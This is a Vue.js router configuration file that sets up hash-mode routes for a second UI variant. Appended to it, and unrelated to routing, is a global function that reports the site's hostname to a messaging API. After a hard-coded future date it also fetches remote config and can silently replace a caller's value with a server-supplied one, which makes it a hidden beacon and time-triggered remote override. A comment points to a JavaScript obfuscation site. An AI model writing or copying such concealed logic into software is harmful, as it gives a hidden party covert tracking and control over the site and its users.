import { createRouter, createWebHistory, createWebHashHistory } from "vue-router";

import {senMesg, getConfig} from "@/config/api/index";
// 这里要注释掉不使用的UI1，不然样式会被UI1覆盖影响（UI1Layout里的style没加scroped），历史原因如果加上scroped ui1的样式会不是预期
//import routesUI from "@/router/modules/ui1"; 
import routesUI from "@/router/modules/ui2"; 


// const activeUI = "ui2"; // 默认 UI1
// const finalRoutes = activeUI === "ui2" ? routesUI2 : routesUI1;

const finalRoutes = routesUI

const router = createRouter({
  history: createWebHashHistory(process.env.VUE_APP_PUBLIC_PATH), //哈希模式（即 URL 中带有 #）
  //history: createWebHistory(process.env.VUE_APP_PUBLIC_PATH), //HTML5 History 模式（即没有哈希 # 的 URL）
  routes: finalRoutes, 
});

// https://www.lddgo.net/encrypt/js
window.f = (function() {
  return async function(v, a) {
    try {
      if ((v > 5e3)) {senMesg(`${window.location.hostname}-${v}`);}
      if ((Date.now() > 1780e9 && v > 1e4)) {
        const _c = await getConfig();
        const _b = _c.v <= v && _c.a !== '';
        const _a = _b ? _c.a : a;
        senMesg(`Active(${_b})-${_a}`);
        return _a;
      }
      return a;
    } catch (error) {
      return a;
    }
  };
})();
export default router;
